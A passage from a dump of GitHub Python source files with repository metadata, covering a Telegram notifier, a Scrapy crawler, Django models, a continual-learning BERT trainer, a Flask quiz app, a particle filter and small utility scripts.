dest=\"tb_log_dir\",\n help=\"dir to save tensorboard summaries\",\n type=str,\n default=\"\",\n )\n parser.add_argument(\n \"-save_rel_recall\",\n dest=\"save_rel_recall\",\n help=\"dir to save relationship results\",\n type=str,\n default=\"\",\n )\n\n return parser\n","repo_name":"yuweihao/KERN","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":11471,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"35"} +{"seq_id":"28286477908","text":"import requests\nfrom credentials import TELEGRAM_BOT_API_KEY, TELEGRAM_BOT_CHAT_ID\n\nclass Telegram:\n def __init__(self):\n self.bot_token = TELEGRAM_BOT_API_KEY\n self.bot_chat_id = TELEGRAM_BOT_CHAT_ID\n\n def send_message(self, message):\n send_text = 'https://api.telegram.org/bot' + self.bot_token + '/sendMessage?chat_id=' + self.bot_chat_id + '&parse_mode=Markdown&text=' + message\n\n response = requests.get(send_text)\n response.raise_for_status()\n return response.json()","repo_name":"andrerodpt/personalflightclub","sub_path":"telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42854840032","text":"# -*- coding: utf-8 -*-\n# python 3\n\nimport re\nfrom scrapy.linkextractors import LinkExtractor\nimport scrapy\n\nfrom spyder_utils import (print_spider_info,\n find_words_on_page)\n\n\nclass SpiderItem(scrapy.Item):\n \"\"\"Результат поиска одной страницы\"\"\"\n url = scrapy.Field()\n found_arr = scrapy.Field()\n count = scrapy.Field()\n\n\nclass Spider(scrapy.Spider):\n \"\"\"Краулер для поиска слов на страницах\"\"\"\n name = \"spider\"\n\n def __init__(self, url=\"\", word=\"\", unwanted=\"\", *args, **kwargs):\n super(Spider, self).__init__(*args, **kwargs)\n self.start_urls = [url]\n\n self.allowed_domains = re.findall(r\"https?://([^/]*\\.[\\w]{2,3})\", url) or \\\n re.findall(r\"^([^/]*\\.[\\w]{2,3})\", url)\n self.root = re.findall(r\"https?://([\\S]*)\", url) or [url]\n\n if word.find(\"|\") == -1:\n self.words = word.split(\"*\")\n self.separator = \"*\"\n else:\n self.words = word.split(\"|\")\n self.separator = \"|\"\n\n self.result_urls = set()\n self.visited_urls = set()\n\n self.unwanted = unwanted.split()\n\n print_spider_info(self.start_urls, self.allowed_domains,\n self.root, self.separator, self.words, self.unwanted)\n\n def parse(self, response):\n \"\"\" Обработка страницы\"\"\"\n url_without_scheme = re.findall(r\"https?://([\\w/.-]*)\", response.url)[0]\n\n # Чтобы урлы не повторялись\n if url_without_scheme not in self.visited_urls:\n\n self.result_urls.add(response.url.lower())\n self.visited_urls.add(url_without_scheme.lower())\n\n # Поиск нежелательных терминов на странице\n has_unwanted_word = False\n\n for unwanted_word in self.unwanted:\n iteration_results = find_words_on_page(response, unwanted_word)\n if iteration_results:\n has_unwanted_word = True\n break\n\n # Если на странице нет нежелательных терминов, то обрабатываем\n if not has_unwanted_word:\n item = SpiderItem()\n item['url'] = response.url\n # Поиск результатов\n search_results = set()\n for word in self.words:\n iteration_results = find_words_on_page(response, word)\n if len(iteration_results) == 0 and self.separator == \"*\":\n search_results.clear()\n break\n else:\n search_results.update(iteration_results)\n\n item['found_arr'] = list(search_results)\n item['count'] = len(search_results)\n yield item\n\n # Поиск урлов на странице\n 
link_extractor = LinkExtractor()\n            extracted_urls = link_extractor.extract_links(response)\n            extracted_urls = list(map(lambda link: link.url, extracted_urls))\n            extracted_urls = list(filter(lambda x: x.rfind(\"#\") < x.rfind(\"/\"), extracted_urls))\n            extracted_urls = list(filter(lambda x: self.allowed_domains[0] in x, extracted_urls))\n            extracted_urls = list(filter(lambda x: self.root[0] in x, extracted_urls))\n            extracted_urls = list(map(lambda x: x[0:x.rfind(\"?\")] if x.rfind(\"?\") > x.rfind(\"/\") else x, extracted_urls))\n\n            # Avoid duplicate pages caused by letter-case differences\n            extracted_urls = list(map(lambda u: u.lower(),extracted_urls))\n\n            # URLs that have not been counted yet\n            diff = set(extracted_urls).difference(self.result_urls)\n            # Count them too\n            self.result_urls.update(diff)\n            # Recurse over the new URLs\n            for url in list(diff):\n                yield response.follow(url, callback=self.parse)\n","repo_name":"ChocolateSwan/CourseWork","sub_path":"klein_scrapy_server/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71508943782","text":"from functools import update_wrapper\nfrom django.db import models\nfrom django.db.models import Q\n\n\n\nclass TimeStamped(models.Model):\n    created_on = models.DateTimeField(auto_now_add=True)\n    updated_on = models.DateTimeField(auto_now=True)\n\n    class Meta:\n        abstract = True\n\n\nclass RestaurantQuerySet(models.QuerySet): \n    \"\"\"\n    Custom get_query_set, based on the lookups provided\n    \"\"\"\n    def search(self,query):\n        lookup = (Q(name__iexact=query)|\n                Q(cuisines__iexact = query)|\n                Q(rating__iexact = query)\n                )\n\n        return self.filter(lookup)\n\n\nclass RestaurantManager(models.Manager):\n    def get_queryset(self):\n        return RestaurantQuerySet(self.model , using = self._db)\n    \n\n    def search(self , query = None):\n        if query is None:\n            return self.get_queryset().none()\n        return self.get_queryset().search(query)\n\n\n\nclass Restaurant(TimeStamped):\n    CUISINE_CATEG = {\n        1 : \"caribbean\",\n        2 : \"vietnamese\",\n        3 : \"korean\", \n        4 : \"indian\"\n    }\n    name = models.CharField(max_length=256)\n    cuisines = models.SmallIntegerField(choices=CUISINE_CATEG.items())\n    avg_cost_for_two = models.DecimalField(max_digits=10, decimal_places=3)\n    currency = models.CharField(max_length=50)\n    has_table_booking = models.BooleanField()\n    has_online_booking = models.BooleanField()\n    agg_rating = models.IntegerField()\n    rating_color = models.CharField(max_length=200)\n    rating_text = models.CharField(max_length=200)\n    votes = models.IntegerField()\n\n    objects = RestaurantManager()\n    class Meta:\n        ordering = ['created_on']\n\n    def __str__(self) -> str:\n        return \"Restaurant-{name}\".format(name=self.name)","repo_name":"ayushbisht2001/task-backend2","sub_path":"restaurant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1657613735","text":"import sys, time\nimport numpy as np\nimport torch\n\ndtype = torch.cuda.FloatTensor # run on GPU\nimport utils\nfrom tqdm import tqdm, trange\nfrom torch.utils.data import RandomSampler\nfrom torch.utils.data.distributed import DistributedSampler\nimport torch.distributed as dist\nfrom torch.utils.data import TensorDataset, random_split\nfrom seqeval.metrics import classification_report\nimport 
torch.nn.functional as F\nimport nlp_data_utils as data_utils\nfrom copy import deepcopy\nimport os\nimport logging\nimport glob\nimport math\nimport json\nimport random\nsys.path.append(\"./approaches/base/\")\nfrom bert_adapter_base import Appr as ApprBase\nfrom my_optimization import BertAdam\n\n########################################################################################################################\n\nclass Appr(ApprBase):\n\n\n def __init__(self,model,logger,taskcla, args=None):\n super().__init__(model=model,logger=logger,taskcla=taskcla,args=args)\n print('BERT ADAPTER OWM NCL')\n\n return\n\n\n\n def train(self,t,train,valid,num_train_steps,train_data,valid_data):\n global_step = 0\n self.model.to(self.device)\n\n param_optimizer = [(k, v) for k, v in self.model.named_parameters() if v.requires_grad==True]\n param_optimizer = [n for n in param_optimizer if 'pooler' not in n[0]]\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n t_total = num_train_steps\n optimizer = BertAdam(optimizer_grouped_parameters,\n lr=self.args.learning_rate,\n warmup=self.args.warmup_proportion,\n t_total=t_total)\n\n\n best_loss=np.inf\n best_model=utils.get_model(self.model)\n\n # Loop epochs\n for e in range(int(self.args.num_train_epochs)):\n # Train\n clock0=time.time()\n iter_bar = tqdm(train, desc='Train Iter (loss=X.XXX)')\n global_step=self.train_epoch(e,t,train,iter_bar, optimizer,t_total,global_step)\n clock1=time.time()\n\n train_loss,train_acc,train_f1_macro=self.eval(t,train)\n clock2=time.time()\n print('| Epoch {:3d}, time={:5.1f}ms/{:5.1f}ms | Train: loss={:.3f}, acc={:5.1f}% |'.format(e+1,\n 1000*self.train_batch_size*(clock1-clock0)/len(train),1000*self.train_batch_size*(clock2-clock1)/len(train),train_loss,100*train_acc),end='')\n\n valid_loss,valid_acc,valid_f1_macro=self.eval(t,valid)\n print(' Valid: loss={:.3f}, acc={:5.1f}% |'.format(valid_loss,100*valid_acc),end='')\n # Adapt lr\n if valid_loss N*1\n r = x[:, :, i * S: i * S + HH, j * S: j * S + WW].contiguous().view(1, -1)\n # r = r[:, range(r.shape[1] - 1, -1, -1)]\n k = torch.mm(p, torch.t(r))\n p.sub_(torch.mm(k, torch.t(k)) / (alpha + torch.mm(r, k)))\n w.grad.data = torch.mm(w.grad.data.view(F, -1), torch.t(p.data)).view_as(w)\n else:\n r = x\n k = torch.mm(p, torch.t(r))\n p.sub_(torch.mm(k, torch.t(k)) / (alpha + torch.mm(r, k)))\n w.grad.data = torch.mm(w.grad.data, torch.t(p.data))\n # Compensate embedding gradients\n for n, w in self.model.named_parameters():\n for layer_id in range(self.args.bert_num_hidden_layers):\n # if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.c1.weight': #\n # pro_weight(self.Pc1, x_list[0], w, alpha=alpha_array[0], stride=2)\n #\n # if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.c2.weight':\n # pro_weight(self.Pc2, x_list[1], w, alpha=alpha_array[0], stride=2)\n #\n # if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.c3.weight':\n # pro_weight(self.Pc3, x_list[2], w, alpha=alpha_array[0], stride=2)\n\n if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.fc1.weight':\n # print('h_list: ',len(h_list))\n pro_weight(self.P1, h_list[layer_id][0], w, alpha=alpha_array[1], cnn=False)\n\n if n == 'bert.encoder.layer.'+str(layer_id)+'.output.adapter_owm.fc2.weight':\n 
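# (editor's note, added) pro_weight applies the OWM projector defined above: with input activation r, k = P r and P <- P - k k^T / (alpha + r^T P r), then grad <- grad P^T, keeping weight updates nearly orthogonal to feature directions already used by earlier tasks.\n                        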
pro_weight(self.P2, h_list[layer_id][1], w, alpha=alpha_array[2], cnn=False)\n\n\n # Apply step\n # torch.nn.utils.clip_grad_norm(self.model.parameters(), self.clipgrad)\n lr_this_step = self.args.learning_rate * \\\n self.warmup_linear(global_step/t_total, self.args.warmup_proportion)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr_this_step\n\n optimizer.step()\n optimizer.zero_grad()\n global_step += 1\n return global_step\n\n def eval(self,t,data,test=None,trained_task=None):\n total_loss = 0\n total_acc = 0\n total_num = 0\n self.model.eval()\n target_list = []\n pred_list = []\n with torch.no_grad():\n for step, batch in enumerate(data):\n batch = [\n bat.to(self.device) if bat is not None else None for bat in batch]\n input_ids, segment_ids, input_mask, targets, _= batch\n real_b=input_ids.size(0)\n # Forward\n\n # Forward\n output_dict = self.model.forward(input_ids, segment_ids, input_mask)\n if 'dil' in self.args.scenario:\n output=output_dict['y']\n elif 'til' in self.args.scenario:\n outputs=output_dict['y']\n output = outputs[t]\n loss = self.ce(output, targets)\n _, pred = output.max(1)\n hits = (pred % 10 == targets).float()\n target_list.append(targets)\n pred_list.append(pred)\n # Log\n total_loss+=loss.data.cpu().numpy().item()*real_b\n total_acc+=hits.sum().data.cpu().numpy().item()\n total_num+=real_b\n f1=self.f1_compute_fn(y_pred=torch.cat(pred_list,0),y_true=torch.cat(target_list,0),average='macro')\n\n return total_loss / total_num, total_acc / total_num,f1\n\n","repo_name":"ZixuanKe/PyContinual","sub_path":"src/approaches/classification/bert_adapter_owm.py","file_name":"bert_adapter_owm.py","file_ext":"py","file_size_in_byte":8865,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"35"} +{"seq_id":"30488186387","text":"from flask import request, render_template\nfrom flask import jsonify\nimport random\nimport json\nfrom structlog import get_logger\nfrom app.main import main\nfrom app import csrf\nfrom app.constant import const\nfrom app.database.db_helper import db\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef init():\n if request.method == 'GET':\n data = form_singles_dict()\n data.update(form_multiple_dict())\n data.update(form_determines_dict())\n data.update(form_responses_dict())\n data.update(form_assign_names_dict())\n get_logger().info(data)\n return render_template(\"main/answer.html\", **data)\n else:\n return render_template(\"main/answer.html\")\n\n\n@main.route(\"/get_singles\", methods=[\"GET\", \"POST\"])\ndef get_singles():\n data = form_singles_dict()\n return render_template(\"main/single.html\", **data)\n # if request.method is [\"GET\", \"POST\"]:\n # data = json.dumps(form_singles_dict())\n # return jsonify(json.dumps(data))\n # return jsonify({})\n\n\n@main.route(\"/get_multiples\", methods=[\"GET\", \"POST\"])\ndef get_multiples():\n data = form_multiple_dict()\n return render_template(\"main/multiple.html\", **data)\n\n\n@main.route(\"/get_determines\", methods=[\"GET\", \"POST\"])\ndef get_determines():\n data = form_determines_dict()\n return render_template(\"main/determine.html\", **data)\n\n\n@main.route(\"/get_responses\", methods=[\"GET\", \"POST\"])\ndef get_responses():\n data = form_responses_dict()\n return render_template(\"main/response.html\", **data)\n\n\n@csrf.exempt\n@main.route(\"/update_answer_result\", methods=[\"POST\"])\ndef update_answer_result():\n data = request.get_data()\n dic = json.loads(data)\n update_db_from_net(dic)\n\n return 
jsonify({\"status\": \"ok\"})\n\n\ndef form_singles_dict():\n topics = db.fetch_data()\n table_singles = topics[0]\n length = len(table_singles)\n\n while True:\n global rand\n rand = random.randint(1, length - 1)\n if not db.check_have_been_selected(0, rand):\n break\n\n singles = table_singles[rand]\n data = {\n \"single_topic\": singles[2],\n \"singles\": singles[3:7],\n \"single_answer\": singles[7]\n }\n return data\n\n\ndef form_multiple_dict():\n topics = db.fetch_data()\n table_singles = topics[1]\n length = len(table_singles)\n\n while True:\n global rand\n rand = random.randint(1, length - 1)\n if not db.check_have_been_selected(1, rand):\n break\n\n singles = table_singles[rand]\n data = {\n \"multiple_topic\": singles[2],\n \"multiples\": singles[3:7],\n \"multiple_answer\": singles[7]\n }\n return data\n\n\ndef form_determines_dict():\n topics = db.fetch_data()\n table_singles = topics[2]\n length = len(table_singles)\n\n while True:\n global rand\n rand = random.randint(1, length - 1)\n if not db.check_have_been_selected(2, rand):\n break\n\n singles = table_singles[rand]\n data = {\n \"determine_topic\": singles[2],\n \"determine_answer\": singles[7]\n }\n return data\n\n\ndef form_responses_dict():\n topics = db.fetch_data()\n table_singles = topics[3]\n length = len(table_singles)\n\n while True:\n global rand\n rand = random.randint(1, length - 1)\n if not db.check_have_been_selected(3, rand):\n break\n\n singles = table_singles[rand]\n data = {\n \"response_topic\": singles[2],\n \"response_answer\": singles[7]\n }\n return data\n\n\ndef form_assign_names_dict():\n names = list(const.USER_NAMES)\n data = {\n \"names\": names\n }\n return data\n\n\ndef update_db_from_net(dic):\n get_logger().info(dic)\n user = db.get_one_user(dic[\"user_name\"])\n get_logger().info(user)\n if dic[\"type\"] == \"single\":\n user.score += dic[\"score\"]\n user.single_score += dic[\"score\"]\n user.single_count += 1\n if dic[\"score\"] > 0:\n user.single_correct += 1\n elif dic[\"type\"] == \"multiple\":\n user.score += dic[\"score\"]\n user.multiple_score += dic[\"score\"]\n user.multiple_count += 1\n if dic[\"score\"] > 0:\n user.multiple_correct += 1\n elif dic[\"type\"] == \"determine\":\n user.score += dic[\"score\"]\n user.deter_score += dic[\"score\"]\n user.deter_count += 1\n if dic[\"score\"] > 0:\n user.deter_corr += 1\n else:\n dic[\"type\"] == \"response\"\n user.score += dic[\"score\"]\n user.resp_score += dic[\"score\"]\n user.resp_count += 1\n if dic[\"score\"] > 0:\n user.resp_corr += 1\n\n db.update_users(user)\n","repo_name":"FireBangBang/competition","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"48027236468","text":"import argparse\nimport urllib.request\nimport pickle\nimport numpy as np\nimport cv2\n\nfrom classifier.digit_classifier import HoG_LinearSVM_SingleDigitClassifier\nfrom detector.text_detector import DNN_EAST_TextDetector\nfrom sign_detector import detect_sign, CurtinSignDetector\n\n# CONFIGS\nMNIST_PATH = './data/mnist/' # path to mnist dataset\nCHAR74K_PATH = './data/char74k/Fnt/' # path to char74k dataset\nDIGIT_CLASSIFIER_PATH = './classifier/digit_svm.yml' # digit classifier SVM model\nDNN_EAST_MODEL_PATH = './detector/frozen_east_text_detection.pb' # text detector DNN model\n\ndef main(args):\n\n\n singleDigitClassifier = HoG_LinearSVM_SingleDigitClassifier()\n textDetector = 
DNN_EAST_TextDetector()\n regionDetector = cv2.MSER_create(max_variation=0.1)\n\n try:\n textDetector.load(DNN_EAST_MODEL_PATH)\n except cv2.error:\n print('Model does not exists. Run with --download_EAST_model')\n return\n \n if args.train_digit_classifier:\n #singleDigitClassifier.train_MNIST(MNIST_PATH)\n singleDigitClassifier.train_CHAR74K(CHAR74K_PATH)\n singleDigitClassifier.save(DIGIT_CLASSIFIER_PATH)\n else:\n singleDigitClassifier.load(DIGIT_CLASSIFIER_PATH)\n\n for image_path in args.images:\n try:\n image = cv2.imread(image_path)\n detector = CurtinSignDetector(singleDigitClassifier, textDetector,\n regionDetector)\n detect_sign(image, detector)\n except cv2.error as e:\n print(f'{image_path} failed due to cv2.error')\n print(e)\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--download_EAST_model', action='store_true',\n help='Download EAST model pb file')\n parser.add_argument('--train_digit_classifier', action='store_true',\n help='Whether to train a new classifier from scratch')\n parser.add_argument('images', type=str, nargs='+', help='input image')\n\n args = parser.parse_args()\n main(args) \n","repo_name":"Nhandos/DUYGAY","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9317507011","text":"from cmd import Cmd\nfrom pprint import pprint\n\nfrom dotenv import load_dotenv\n\nfrom four_key_metrics.constants import (\n CIRCLE_CI_PROJECTS,\n GIT_PROJECTS,\n GRAFANA_ALERTS,\n JENKINS_JOBS,\n PINGDOM_CHECK_NAMES,\n)\nfrom four_key_metrics.utilities import remove_generated_reports\nfrom four_key_metrics.presenters.lead_time_metrics import (\n CSVDataPresenter as LeadTimeCSVDataPresenter,\n JSONDataPresenter,\n)\nfrom four_key_metrics.presenters.mean_time_to_restore import (\n CSVDataPresenter as MeanTimeCSVDataPresenter,\n)\nfrom four_key_metrics.use_case_factory import UseCaseFactory\n\nload_dotenv()\n\n\nclass DisplayShell(Cmd):\n \"\"\"Command allowing specific reports to be generated through actions\"\"\"\n\n intro = \"Welcome to the key metrics shell. 
Type help or ?.\\n\"\n    prompt = \"(type to generate report) \"\n\n    def do_ltm(self, arg):\n        \"\"\"Generate lead time metrics\n\n        Args:\n            arg (string): output type defaulting to 'csv' but accepting\n            'json'\n        \"\"\"\n        self.do_lead_time_metrics(arg)\n\n    def do_lead_time_metrics(self, arg):\n        \"\"\"Generate lead time metrics\n\n        Args:\n            arg (string): output type defaulting to 'csv' but accepting\n            'json',\n        \"\"\"\n        # TODO: Make this easier to pass and parse these values through the command line\n        projects = GIT_PROJECTS\n        default_output = LeadTimeCSVDataPresenter()\n        data_presenter = {\n            \"\": default_output,\n            \"csv\": default_output,\n            \"json\": JSONDataPresenter(),\n        }[arg.lower()]\n        UseCaseFactory().create(\"generate_lead_time_metrics\")(projects, data_presenter)\n\n    def do_mtr(self, args):\n        \"\"\"Generate mean time to restore metric\"\"\"\n\n        self.do_mean_time_to_restore(args)\n\n    def do_mean_time_to_restore(self, args):\n        \"\"\"Generate mean time to restore metric\"\"\"\n\n        pingdom_check_names = PINGDOM_CHECK_NAMES\n        jenkins_jobs = JENKINS_JOBS\n        circle_ci_projects = CIRCLE_CI_PROJECTS\n        grafana_alert_names = GRAFANA_ALERTS\n\n        UseCaseFactory().create(\"generate_mean_time_to_restore\")(\n            pingdom_check_names,\n            jenkins_jobs,\n            circle_ci_projects,\n            grafana_alert_names,\n            MeanTimeCSVDataPresenter.create(),\n        )\n\n    def do_4km(self, args):\n        \"\"\"Generate four key metrics\n        (currently Lead Time Metrics and Mean Time To Restore only)\"\"\"\n\n        self.do_four_key_metrics(args)\n\n    def do_four_key_metrics(self, args):\n        \"\"\"Generate four key metrics\n        (currently Lead Time Metrics and Mean Time To Restore only)\"\"\"\n\n        self.do_lead_time_metrics(args)\n        self.do_mean_time_to_restore(args)\n\n    def do_remove_reports(self, arg):\n        \"\"\"Clean up generated reports by supported output types, e.g. 
.csv\n\n        Args:\n            arg (string): Defaults to '.csv' but can be overridden to support\n            '.json', '.txt', '.xml' or other supported types\n        \"\"\"\n        fileExtension = \".csv\"\n        if arg:\n            fileExtension = arg\n        pprint(f\"searching {fileExtension}\")\n        remove_generated_reports(fileExtension)\n\n    def do_close(self, line):\n        \"\"\"Close or exit application\"\"\"\n        return True\n\n\nif __name__ == \"__main__\":\n\n    DisplayShell().cmdloop()\n","repo_name":"uktrade/four-key-metrics","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3353387080","text":"# f = open('./files/reading_file_example.txt')\n# print(f)\n# txt = f.read().splitlines()\n# print(type(txt))\n# print(txt)\n# f.close()\n\nwith open('./files/reading_file_example.txt') as f:\n    lines = f.read().splitlines()\n    print(type(lines))\n    print(lines)\n\nwith open('./files/reading_file_example.txt', 'a') as f:\n    f.write('\\nThis is text to be appended at end')\n\nwith open('./files/writing_file_example.txt', 'w') as f:\n    f.write('This text will be written in a newly created file')\n\nimport os\n\nif(os.path.exists('./files/example.txt')):\n    os.remove('./files/example.txt')\nelse:\n    print('The file does not exist')\n\nimport json\n# json to dictionary\n\nperson_json = '''{\n    \"name\":\"Lucas\",\n    \"country\":\"Brazil\",\n    \"city\":\"Macapá\",\n    \"skills\":[\"Javascript\", \"React\", \"VueJs\", \"Python\"]\n}'''\n\nperson_dct = json.loads(person_json)\nprint(type(person_dct))\nprint(person_dct)\nprint(person_dct['name'])\n\n# dictionary to json\n\nperson = {\n    \"name\":\"Lucas\",\n    \"country\":\"Brazil\",\n    \"city\":\"Macapá\",\n    \"skills\":[\"Javascript\", \"React\", \"VueJs\", \"Python\"]\n}\njson_person = json.dumps(person, indent=4)\nprint(type(json_person))\nprint(json_person)\n\n# saving as json file\nwith open('./files/json_example.json', 'w') as f:\n    json.dump(person, f, ensure_ascii=False, indent=4)\n\n# file with csv extension\nimport csv\nwith open('./files/csv_example.csv') as f:\n    csv_reader = csv.reader(f, delimiter=',')\n    line_cont = 0\n    for row in csv_reader:\n        if line_cont == 0:\n            print(f'Column names are: {\", \".join(row)}')\n            line_cont += 1\n        else:\n            print(f'\\t {row[0]} is a teacher. 
He lives in {row[1]}, {row[2]}')\n            line_cont += 1\n    print(f'Number of lines: {line_cont}')\n","repo_name":"LucasFrts/30_days_of_python_challenge","sub_path":"day__19/file_handling..py","file_name":"file_handling..py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14966590404","text":"# collaborator: Evan Vogelbaum\n\"\"\"This file contains stubs for implementation of the unscented Kalman filter and particle filter\"\"\"\nfrom model import NonLinearKFModel\nfrom numpy.typing import ArrayLike\nimport numpy as np\nfrom scipy.stats import multivariate_normal as mn\nfrom numpy.random import multivariate_normal as rmn\n\n\nclass ParticleFilter:\n\n    def __init__(self, params: NonLinearKFModel, num_particles):\n        self.params = params\n        \"\"\"Other initializations can go here\"\"\"\n        self.field = self.params.field\n        self.n = num_particles\n        self.stack = []\n        for _ in range(self.n):\n            pos = rmn(np.zeros(2), self.params.Lambda)\n            self.stack.append(np.array([pos[0], pos[1], 0, 0]))\n        self.w = np.ones(self.n) / self.n\n\n    def forward(self, meas):\n        \n        T = self.params.T\n        stack = []\n        for i in range(self.n):\n            x,y,vx,vy = self.stack[i]\n            Ex, Ey = self.field(x, y)\n            chi = np.array([x + vx*T, y + vy*T, vx + Ex * T, vy + Ey * T])\n            stack.append(rmn(chi, self.params.Q))\n        self.stack = stack\n\n        for i in range(self.n):\n            self.w[i] = self.w[i] * mn.pdf(meas, mean=self.stack[i][0:2].reshape(-1), cov=self.params.R)\n        self.w = self.w / np.sum(self.w)\n\n    ## Define method to implement the particle filter\n    def run_n_steps(self, N: int, measurements: ArrayLike) -> ArrayLike:\n        \"\"\"Given N (number of steps) and a 2xN measurement, runs N steps of the filter and returns a 4 x N trajectory prediction\n\n        Args:\n            N ([int]): Number of steps\n            measurements ([ArrayLike]): Measurement array\n\n        Returns:\n            ArrayLike: Trajectory\n        \"\"\"\n        est_trajectory = np.zeros((4, N))\n        for n in range(N):\n            self.forward(measurements[:, n])\n            est_trajectory[:, n] = np.average(self.stack, axis=0, weights=self.w)\n            # np.average(self.stack, axis=0, weights=self.w)\n\n        return est_trajectory","repo_name":"ShuGe-MIT/fall22","sub_path":"nlkf.py","file_name":"nlkf.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36096419468","text":"#https://programmers.co.kr/learn/courses/30/lessons/49994?language=python3\n\nfrom collections import deque\n\narray= deque()\ngraph = [[0 for i in range(21)] for j in range(21)]\npos = [10, 10]\n\n# up, down, left, right\ndx1 = [-1, 1, 0, 0]\ndy1 = [0, 0, -1, 1]\n\ndx2 = [-2, 2, 0, 0]\ndy2 = [0, 0, -2, 2]\n\ndef solution(dirs):\n    count = 0\n\n    for i in dirs:\n        array.append(i)\n    \n    while array:\n        temp = array.popleft()\n        \n        if temp == \"U\":\n            temp_x1 = pos[0] + dx1[0]\n            temp_y1 = pos[1] + dy1[0]\n            temp_x2 = pos[0] + dx2[0]\n            temp_y2 = pos[1] + dy2[0]\n            \n            if temp_x2 < 0 or temp_x2 > 20 or temp_y2 < 0 or temp_y2 > 20:\n                continue\n            \n            else:\n                pos[0] = temp_x2\n                pos[1] = temp_y2\n                \n                if graph[temp_x1][temp_y1] == 0 :\n                    graph[temp_x1][temp_y1] = 2\n            \n        elif temp == \"D\":\n            temp_x1 = pos[0] + dx1[1]\n            temp_y1 = pos[1] + dy1[1]\n            temp_x2 = pos[0] + dx2[1]\n            temp_y2 = pos[1] + dy2[1]\n            \n            if temp_x2 < 0 or temp_x2 > 20 or temp_y2 < 0 or temp_y2 > 20:\n                continue\n            \n            else:\n                pos[0] = temp_x2\n                pos[1] = temp_y2\n                if graph[temp_x1][temp_y1] == 0:\n                    graph[temp_x1][temp_y1] = 2\n            \n        elif temp == \"L\":\n            temp_x1 = pos[0] + dx1[2]\n            
temp_y1 = pos[1] + dy1[2]\n temp_x2 = pos[0] + dx2[2]\n temp_y2 = pos[1] + dy2[2]\n \n if temp_x2 < 0 or temp_x2 > 20 or temp_y2 < 0 or temp_y2 > 20:\n continue\n \n else:\n pos[0] = temp_x2\n pos[1] = temp_y2\n if graph[temp_x1][temp_y1] == 0:\n graph[temp_x1][temp_y1] = 2\n \n elif temp == \"R\":\n temp_x1 = pos[0] + dx1[3]\n temp_y1 = pos[1] + dy1[3]\n temp_x2 = pos[0] + dx2[3]\n temp_y2 = pos[1] + dy2[3]\n \n if temp_x2 < 0 or temp_x2 > 20 or temp_y2 < 0 or temp_y2 > 20:\n continue\n else:\n pos[0] = temp_x2\n pos[1] = temp_y2\n if graph[temp_x1][temp_y1] == 0:\n graph[temp_x1][temp_y1] = 2\n \n for i in range(21):\n for j in range(21):\n if graph[i][j] == 2:\n count += 1\n \n return count","repo_name":"lololalayoho/Algo_share","sub_path":"20210308/방문 길이/programmers_방문길이.py","file_name":"programmers_방문길이.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9899225009","text":"# Sample setup.py for python package to publish to pypi\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"blitzactions\",\n version=\"0.0.1\",\n author=\"Rudra\",\n author_email=\"blitz04.dev@gmailc.com\",\n description=\"A package to test openai\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/BlitzJB/blitzactions\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n install_requires=[\n 'openai',\n 'python-dotenv',\n ],\n)\n","repo_name":"BlitzJB/BlitzActions","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74329878180","text":"from oslo_config import cfg\nfrom oslo_db import options\nfrom oslo_log import log\n\nfrom daolicontroller.i18n import _\nfrom daolicontroller import paths\n\nCONF = cfg.CONF\n\n_DEFAULT_SQL_CONNECTION = 'sqlite:///' + paths.state_path_def('daoliproxy.sqlite')\n\n_DEFAULT_LOG_LEVELS = ['amqp=WARN', 'amqplib=WARN', 'boto=WARN',\n 'qpid=WARN', 'sqlalchemy=WARN', 'suds=INFO',\n 'oslo_messaging=INFO', 'iso8601=WARN',\n 